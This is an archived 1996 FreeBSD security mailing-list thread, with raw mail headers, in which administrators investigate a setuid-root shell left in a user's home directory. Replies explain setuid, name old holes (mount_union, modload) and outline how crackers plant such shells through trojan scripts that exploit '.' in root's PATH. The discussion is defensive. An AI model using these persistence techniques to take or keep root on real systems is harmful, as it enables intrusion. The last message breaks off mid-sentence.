one would hope that such a chintsy method > wouldn't work on most systems. Yeah, that's the real question is like if he can transfer the binary from another machine and have it work... other people can do the same thing and gain access to FreeBSD boxes as root as long as they have a account on that machine... Vince GaiaNet - System Administration From owner-freebsd-security Mon Jun 24 16:55:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA24737 for security-outgoing; Mon, 24 Jun 1996 16:55:32 -0700 (PDT) Received: from onyx.auscert.org.au (onyx0.auscert.org.au [203.5.112.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA24712; Mon, 24 Jun 1996 16:55:23 -0700 (PDT) Received: from amethyst.auscert.org.au (amethyst.auscert.org.au [203.5.112.218]) by onyx.auscert.org.au (8.7.5/8.7.1) with ESMTP id JAA10960; Tue, 25 Jun 1996 09:55:15 +1000 (EST) Received: from localhost (localhost [127.0.0.1]) by amethyst.auscert.org.au (8.7.5/8.7.2) with SMTP id JAA29733; Tue, 25 Jun 1996 09:55:13 +1000 (EST) Message-Id: <199606242355.JAA29733@amethyst.auscert.org.au> X-Authentication-Warning: amethyst.auscert.org.au: Host localhost [127.0.0.1] didn't use HELO protocol X-Mailer: exmh version 1.6.7 5/3/96 To: "Jordan K. Hubbard" Cc: guido@gvr.win.tue.nl (Guido van Rooij), hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: No comment character in hosts.equiv In-Reply-To: Your message of "Sun, 23 Jun 1996 23:29:30 MST." <10326.835597770@time.cdrom.com> Mime-Version: 1.0 Content-Type: application/pgp; format=mime; x-action=signclear; x-originator=720360CD Content-Transfer-Encoding: 7bit Date: Tue, 25 Jun 1996 09:55:12 +1000 From: Danny Smith Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Content-Type: text/plain; charset=us-ascii (Note the change of subject line!) "Jordan K. Hubbard" writes: > Hmmm. We have reason to believe that he *didn't* get root (though > we're still assuming he did, just to be paranoid) and if the mod times > can be trusted, hosts.equiv hasn't been touched in many months (and > localhost is commented out). ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ There is no comment character in either the hosts.equiv file or the .rhosts file. Use of this may allow someone to spoof DNS and gained trusted access. Check out the code relating to calls to ruserok(). This is clearly detailed in the AUSCERT Unix Security Checklist which can probably be obtained from a mirror site near you (access to the AUSCERT ftp server has been temporarily restricted due to funding shortages). Danny Smith. ========================================================================== Danny Smith | Fax: +61 7 3365 4477 AUSCERT | Phone: +61 7 3365 4417 c/- Prentice Centre | (answered during business hours) The University of Queensland | (on call after hours for emergencies) Qld. 4072. Australia | Internet: auscert@auscert.org.au -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Finger pgp@ftp.auscert.org.au to retrieve AUSCERT's public key iQCVAwUBMc+3fSh9+71yA2DNAQECawP7B/jmCyZN6NgANUku2wFcnJ+6DyxCPTYP QsORkyWfs79PKqItgx3XLO4CpBT0YXNUC6Q2TKwopSrj0mn1gX4+zJKGImWGAE0s 5DUM8XBenfU/+rxAltPiFvneORPbTGg9wZaSlAVISuxTJH7T8LghIiPFw58oELcY WbetUnf1G7w= =mEVx -----END PGP SIGNATURE----- From owner-freebsd-security Mon Jun 24 17:04:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA25166 for security-outgoing; Mon, 24 Jun 1996 17:04:32 -0700 (PDT) Received: from po9.andrew.cmu.edu (PO9.ANDREW.CMU.EDU [128.2.10.109]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA25160; Mon, 24 Jun 1996 17:04:30 -0700 (PDT) Received: (from postman@localhost) by po9.andrew.cmu.edu (8.7.5/8.7.3) id UAA09427; Mon, 24 Jun 1996 20:04:24 -0400 Received: via switchmail; Mon, 24 Jun 1996 20:04:22 -0400 (EDT) Received: from unix13.andrew.cmu.edu via qmail ID ; Mon, 24 Jun 1996 20:04:07 -0400 (EDT) Received: from unix13.andrew.cmu.edu via qmail ID ; Mon, 24 Jun 1996 20:04:06 -0400 (EDT) Received: from mms.4.60.Jan.26.1995.18.43.47.sun4c.411.EzMail.2.0.CUILIB.3.45.SNAP.NOT.LINKED.unix13.andrew.cmu.edu.sun4c.411 via MS.5.6.unix13.andrew.cmu.edu.sun4c_411; Mon, 24 Jun 1996 20:04:05 -0400 (EDT) Message-ID: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu> Date: Mon, 24 Jun 1996 20:04:05 -0400 (EDT) From: Matthew Jason White Subject: Re: I need help on this one - please help me track this guy down! Cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt In-Reply-To: References: Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Excerpts from freebsd-security: 24-Jun-96 Re: I need help on this one.. by -Vince-@mercury.gaianet. > Yeah, that's the real question is like if he can transfer the > binary from another machine and have it work... other people can do the > same thing and gain access to FreeBSD boxes as root as long as they have > a account on that machine... That shouldn't be possible. FreeBSD wouldn't allow the transfer program to assign root ownership to a program unless that program is run as root. The programs typically run on a FreeBSD system as root do not assign ownership in this way. This guy must've gotten root some other way and then created the shell so that he could get root again in the future. You probably want to change the security script so that it points out ALL suid programs in /usr/home, /tmp, /var/tmp and /usr/tmp, or any other publicly writeable area. Are you running inn1.4 on this system? If so, you should probably upgrade to inn-1.4uoff4 (this port should prolly be upgraded, if someone hasn't already). -Matt ----- Matt White Email: mwhite+@cmu.edu http://www.cs.cmu.edu/afs/cs/user/mwhite/www/ From owner-freebsd-security Mon Jun 24 17:11:02 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA25392 for security-outgoing; Mon, 24 Jun 1996 17:11:02 -0700 (PDT) Received: from critter.tfs.com ([140.145.16.108]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA25387; Mon, 24 Jun 1996 17:10:59 -0700 (PDT) Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.7.5/8.7.3) with ESMTP id RAA01094; Mon, 24 Jun 1996 17:09:49 -0700 (PDT) To: -Vince- cc: Matthew Jason White , Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 16:54:26 PDT." Date: Mon, 24 Jun 1996 17:09:48 -0700 Message-ID: <1092.835661388@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > Yeah, that's the real question is like if he can transfer the >binary from another machine and have it work... other people can do the >same thing and gain access to FreeBSD boxes as root as long as they have >a account on that machine... The binary is an ordinary shell with a setuid bit. -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Mon Jun 24 17:14:30 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA25589 for security-outgoing; Mon, 24 Jun 1996 17:14:30 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA25568; Mon, 24 Jun 1996 17:14:24 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id RAA21505; Mon, 24 Jun 1996 17:14:08 -0700 (PDT) Date: Mon, 24 Jun 1996 17:14:07 -0700 (PDT) From: -Vince- To: Poul-Henning Kamp cc: Matthew Jason White , Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <1092.835661388@critter.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Poul-Henning Kamp wrote: > > Yeah, that's the real question is like if he can transfer the > >binary from another machine and have it work... other people can do the > >same thing and gain access to FreeBSD boxes as root as long as they have > >a account on that machine... > > The binary is an ordinary shell with a setuid bit. Hmmm, how did they get the file into their account with the setuid bit? Vince From owner-freebsd-security Mon Jun 24 17:21:01 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA25948 for security-outgoing; Mon, 24 Jun 1996 17:21:01 -0700 (PDT) Received: from palmer.demon.co.uk (palmer.demon.co.uk [158.152.50.150]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA25935; Mon, 24 Jun 1996 17:20:54 -0700 (PDT) Received: from palmer.demon.co.uk (localhost [127.0.0.1]) by palmer.demon.co.uk (sendmail/PALMER-2) with ESMTP id BAA27782; Tue, 25 Jun 1996 01:18:48 +0100 (BST) To: -Vince- cc: hackers@FreeBSD.ORG, security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 16:54:26 PDT." Date: Tue, 25 Jun 1996 01:18:45 +0100 Message-ID: <27780.835661925@palmer.demon.co.uk> Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk [ CC: Trimmed ] > Yeah, that's the real question is like if he can transfer the > binary from another machine and have it work... other people can do the > same thing and gain access to FreeBSD boxes as root as long as they have > a account on that machine... Sort of. You need root access in the first place to create a suid root shell... It could be an old exploit that is now closed (like the mount_union loophole)... Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jun 24 17:26:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA26306 for security-outgoing; Mon, 24 Jun 1996 17:26:57 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA26286; Mon, 24 Jun 1996 17:26:54 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id RAA22761; Mon, 24 Jun 1996 17:26:36 -0700 (PDT) Date: Mon, 24 Jun 1996 17:26:35 -0700 (PDT) From: -Vince- To: Matthew Jason White cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Matthew Jason White wrote: > Excerpts from freebsd-security: 24-Jun-96 Re: I need help on this one.. > by -Vince-@mercury.gaianet. > > Yeah, that's the real question is like if he can transfer the > > binary from another machine and have it work... other people can do the > > same thing and gain access to FreeBSD boxes as root as long as they have > > a account on that machine... > > That shouldn't be possible. FreeBSD wouldn't allow the transfer program > to assign root ownership to a program unless that program is run as > root. The programs typically run on a FreeBSD system as root do not > assign ownership in this way. This guy must've gotten root some other > way and then created the shell so that he could get root again in the > future. Yeah, that's what I'm thinking... Since it seems like there was a problem of running ypwhich to get root on another machine running 2.1R but in -current, it doesn't work. > You probably want to change the security script so that it points out > ALL suid programs in /usr/home, /tmp, /var/tmp and /usr/tmp, or any > other publicly writeable area. Are you running inn1.4 on this system? > If so, you should probably upgrade to inn-1.4uoff4 (this port should > prolly be upgraded, if someone hasn't already). Hmmm, we're not running inn at all... Vince From owner-freebsd-security Mon Jun 24 17:29:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA26490 for security-outgoing; Mon, 24 Jun 1996 17:29:06 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA26469; Mon, 24 Jun 1996 17:29:00 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id RAA22946; Mon, 24 Jun 1996 17:28:45 -0700 (PDT) Date: Mon, 24 Jun 1996 17:28:45 -0700 (PDT) From: -Vince- To: Gary Palmer cc: hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <27780.835661925@palmer.demon.co.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Gary Palmer wrote: > [ CC: Trimmed ] > > > Yeah, that's the real question is like if he can transfer the > > binary from another machine and have it work... other people can do the > > same thing and gain access to FreeBSD boxes as root as long as they have > > a account on that machine... > > Sort of. You need root access in the first place to create a suid root > shell... It could be an old exploit that is now closed (like the > mount_union loophole)... Yeah, I was thinking you do need to be root in the first place to do it. I think this guy got a account after ther mount_union loophole since we're running -current and -current did fix the security problems... Vince From owner-freebsd-security Mon Jun 24 17:51:38 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA28049 for security-outgoing; Mon, 24 Jun 1996 17:51:38 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA28038; Mon, 24 Jun 1996 17:51:34 -0700 (PDT) Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id KAA25110; Tue, 25 Jun 1996 10:55:44 +0930 From: Michael Smith Message-Id: <199606250125.KAA25110@genesis.atrad.adelaide.edu.au> Subject: Re: I need help on this one - please help me track this guy down! To: mark@grumble.grondar.za.@grondar.za (Mark Murray) Date: Tue, 25 Jun 1996 10:55:43 +0930 (CST) Cc: richardc@CSUA.Berkeley.EDU, mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org In-Reply-To: <199606242043.WAA06435@grumble.grondar.za> from "Mark Murray" at Jun 24, 96 10:43:36 pm MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Mark Murray stands accused of saying: > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > ^ > | This is a setuid prog. The program is owned by root, and is > SETUID, therefore it will run as if it were root. It is > probably a shell (bash, sh, csh) renamed to root and setuid. > "chmod 755 root" will cut it down to size. lovely:~>ls -l /bin/sh -r-xr-xr-x 1 bin bin 278528 Jun 19 20:34 /bin/sh The question is, of course, what a setuid-root copy of /bin/sh is doing in this user's home directory. Have you fixed the 'modload' hole on this system yet? > Mark Murray -- ]] Mike Smith, Software Engineer msmith@atrad.adelaide.edu.au [[ ]] Genesis Software genesis@atrad.adelaide.edu.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control (ph/fax) +61-8-267-3039 [[ ]] Collector of old Unix hardware. "Where are your PEZ?" The Tick [[ From owner-freebsd-security Mon Jun 24 18:08:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA28896 for security-outgoing; Mon, 24 Jun 1996 18:08:55 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA28877; Mon, 24 Jun 1996 18:08:47 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id SAA26787; Mon, 24 Jun 1996 18:07:01 -0700 (PDT) Date: Mon, 24 Jun 1996 18:07:00 -0700 (PDT) From: -Vince- To: Michael Smith cc: mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250125.KAA25110@genesis.atrad.adelaide.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Michael Smith wrote: > Mark Murray stands accused of saying: > > > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > > ^ > > | This is a setuid prog. The program is owned by root, and is > > SETUID, therefore it will run as if it were root. It is > > probably a shell (bash, sh, csh) renamed to root and setuid. > > "chmod 755 root" will cut it down to size. > > lovely:~>ls -l /bin/sh > -r-xr-xr-x 1 bin bin 278528 Jun 19 20:34 /bin/sh > > The question is, of course, what a setuid-root copy of /bin/sh is doing > in this user's home directory. Have you fixed the 'modload' hole on this > system yet? Yeah, the modload hole was fixed a long time ago as well as the man hole... Getting /bin/sh with setuid-root is the really strange part.. Vince From owner-freebsd-security Mon Jun 24 19:23:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA11754 for security-outgoing; Mon, 24 Jun 1996 19:23:35 -0700 (PDT) Received: from Fieber-John.campusview.indiana.edu (Fieber-John.campusview.indiana.edu [149.159.1.34]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA11744; Mon, 24 Jun 1996 19:23:30 -0700 (PDT) Received: from localhost (jfieber@localhost) by Fieber-John.campusview.indiana.edu (8.7.5/8.7.3) with SMTP id VAA09686; Mon, 24 Jun 1996 21:22:55 -0500 (EST) X-Authentication-Warning: Fieber-John.campusview.indiana.edu: jfieber owned process doing -bs Date: Mon, 24 Jun 1996 21:22:55 -0500 (EST) From: John Fieber X-Sender: jfieber@Fieber-John.campusview.indiana.edu To: -Vince- cc: "Jordan K. Hubbard" , Mark Murray , Wilko Bulte , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, -Vince- wrote: > Good one Jordan :-) But the thing is how did he get that binary there > in the first place since if he can do that here, then he can do that on any > machine that he doesn't have group wheel on to gain root access... I'll Um, have people forgotten about the nifty little mount trick that used to be a FreeBSD feature? You would only need to use it once to install your root command. -john == jfieber@indiana.edu =========================================== == http://fallout.campusview.indiana.edu/~jfieber ================ From owner-freebsd-security Mon Jun 24 19:42:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA14403 for security-outgoing; Mon, 24 Jun 1996 19:42:21 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA14355; Mon, 24 Jun 1996 19:42:09 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id TAA07514; Mon, 24 Jun 1996 19:41:43 -0700 (PDT) Date: Mon, 24 Jun 1996 19:41:43 -0700 (PDT) From: -Vince- To: John Fieber cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, John Fieber wrote: > On Mon, 24 Jun 1996, -Vince- wrote: > > > Good one Jordan :-) But the thing is how did he get that binary there > > in the first place since if he can do that here, then he can do that on any > > machine that he doesn't have group wheel on to gain root access... I'll > > Um, have people forgotten about the nifty little mount trick that > used to be a FreeBSD feature? You would only need to use it once > to install your root command. Nah, that isn't it since we're running -current and I fixed that problem when it was announced..... both the man and the mount_union hole... Vince From owner-freebsd-security Mon Jun 24 19:49:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA15869 for security-outgoing; Mon, 24 Jun 1996 19:49:10 -0700 (PDT) Received: from einstein.technet.sg (ngps@einstein.technet.sg [192.169.33.50]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA15819; Mon, 24 Jun 1996 19:49:00 -0700 (PDT) Received: (from ngps@localhost) by einstein.technet.sg (8.7.3/8.6.9) id KAA20559; Tue, 25 Jun 1996 10:48:41 +0800 (SST) Date: Tue, 25 Jun 1996 10:48:40 +0800 (SST) From: Ng Pheng Siong To: -Vince- cc: John Fieber , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, -Vince- wrote: > Nah, that isn't it since we're running -current and I fixed that > problem when it was announced..... both the man and the mount_union hole... I suppose you've walked your filesystems for setuid programs? - PS -- Ng Pheng Siong * Finger for PGP key. Pacific Internet Pte Ltd * Singapore Fast, secure, cheap. Pick two. From owner-freebsd-security Mon Jun 24 19:50:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA16086 for security-outgoing; Mon, 24 Jun 1996 19:50:03 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA16028; Mon, 24 Jun 1996 19:49:55 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id TAA08365; Mon, 24 Jun 1996 19:49:30 -0700 (PDT) Date: Mon, 24 Jun 1996 19:49:30 -0700 (PDT) From: -Vince- To: Ng Pheng Siong cc: John Fieber , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Ng Pheng Siong wrote: > On Mon, 24 Jun 1996, -Vince- wrote: > > Nah, that isn't it since we're running -current and I fixed that > > problem when it was announced..... both the man and the mount_union hole... > > I suppose you've walked your filesystems for setuid programs? Yep... did that... Vince From owner-freebsd-security Mon Jun 24 23:13:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA19255 for security-outgoing; Mon, 24 Jun 1996 23:13:10 -0700 (PDT) Received: from grumble.grondar.za (grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA19242; Mon, 24 Jun 1996 23:12:54 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id IAA07772; Tue, 25 Jun 1996 08:11:26 +0200 (SAT) Message-Id: <199606250611.IAA07772@grumble.grondar.za> To: -Vince- cc: hackers@freebsd.org, security@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! Date: Tue, 25 Jun 1996 08:11:25 +0200 From: Mark Murray Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk [cc: trimmed] -Vince- wrote: > > Try me. Cut out the rubbish and the library crap. > > Well, it's actually easier to mail you the binary... Please do, or FTP it to ftp.grondar.za:/incoming. M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 23:26:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA19924 for security-outgoing; Mon, 24 Jun 1996 23:26:58 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA19904; Mon, 24 Jun 1996 23:26:55 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id XAA29359; Mon, 24 Jun 1996 23:25:33 -0700 (PDT) Date: Mon, 24 Jun 1996 23:25:29 -0700 (PDT) From: -Vince- To: Mark Murray cc: hackers@freebsd.org, security@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250611.IAA07772@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Mark Murray wrote: > [cc: trimmed] > > -Vince- wrote: > > > > Try me. Cut out the rubbish and the library crap. > > > > Well, it's actually easier to mail you the binary... > > Please do, or FTP it to ftp.grondar.za:/incoming. Think the problem is solved already but I'll mail you the binary.. Cheers, -Vince- richardc@CSUA.Berkeley.EDU - vince@COSC.GOV - vince@cygnus.sy.yale.edu GUS Mailing Lists Admin - http://www.COSC.GOV/~vince UC Berkeley AstroPhysics (B.S.) - Electrical Engineering (Honorary B.S.) Chabot Observatory & Science Center - Oakland, California USA Computing Networking Operations - Advisory Council Member Running FreeBSD - Real UN*X for Free! Linda Wong/Vivian Chow/Hacken Lee/Danny Chan/Priscilla Chan Fan Club Mailing Lists Admin 1996 Estoril Blue BMW ///M3 - BMW CCA Member Golden Gate Chapter From owner-freebsd-security Mon Jun 24 23:30:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA20165 for security-outgoing; Mon, 24 Jun 1996 23:30:32 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA20152; Mon, 24 Jun 1996 23:30:24 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id IAA07815; Tue, 25 Jun 1996 08:25:11 +0200 (SAT) Message-Id: <199606250625.IAA07815@grumble.grondar.za> To: -Vince- cc: Matthew Jason White , Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! Date: Tue, 25 Jun 1996 08:25:10 +0200 From: Mark Murray Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote: > > I think perhaps a better question to be asking is how this guy got a > > suid shell on that system. It could have been a booby-trapped program > > that got run as root, but one would hope that such a chintsy method > > wouldn't work on most systems. > > Yeah, that's the real question is like if he can transfer the > binary from another machine and have it work... other people can do the > same thing and gain access to FreeBSD boxes as root as long as they have > a account on that machine... I must be a little harsh here, but I'll be diplomatic, OK? :-) You didn't know it was a setuid file, in fact you seemed not to know what a setuid file was. (Am I correct?) If someone has root on your machine, which he will have if he has a setuid shell, he has the ability to compromise your whole (possibly weakly set up) network. If you do not know the basics, like setuid, you are WIDE open for this kind of attack. This shell could have been created two ways (That are currently in popular cracker use): 1) The cracker snooped your root password somehow, (digging through your desk/dustbin or by running a snooper somewhere), then created this suid shell for future use. 2) The Cracker made a trojan script somewhere (usually exploiting some admins (roots) who have "." in their path). This way he creates a script that when run as root will make him a suid program. after this he has you by tender bits. There are other ways, but these are the most popular. For much more info, I recommend "Practical Unix Security" from O'Reilly and Associates, (By Garfinkel?) M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 23:33:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA20361 for security-outgoing; Mon, 24 Jun 1996 23:33:37 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA20340; Mon, 24 Jun 1996 23:33:33 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id XAA00291; Mon, 24 Jun 1996 23:32:56 -0700 (PDT) Date: Mon, 24 Jun 1996 23:32:55 -0700 (PDT) From: -Vince- To: Mark Murray cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250625.IAA07815@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Mark Murray wrote: > -Vince- wrote: > > > I think perhaps a better question to be asking is how this guy got a > > > suid shell on that system. It could have been a booby-trapped program > > > that got run as root, but one would hope that such a chintsy method > > > wouldn't work on most systems. > > > > Yeah, that's the real question is like if he can transfer the > > binary from another machine and have it work... other people can do the > > same thing and gain access to FreeBSD boxes as root as long 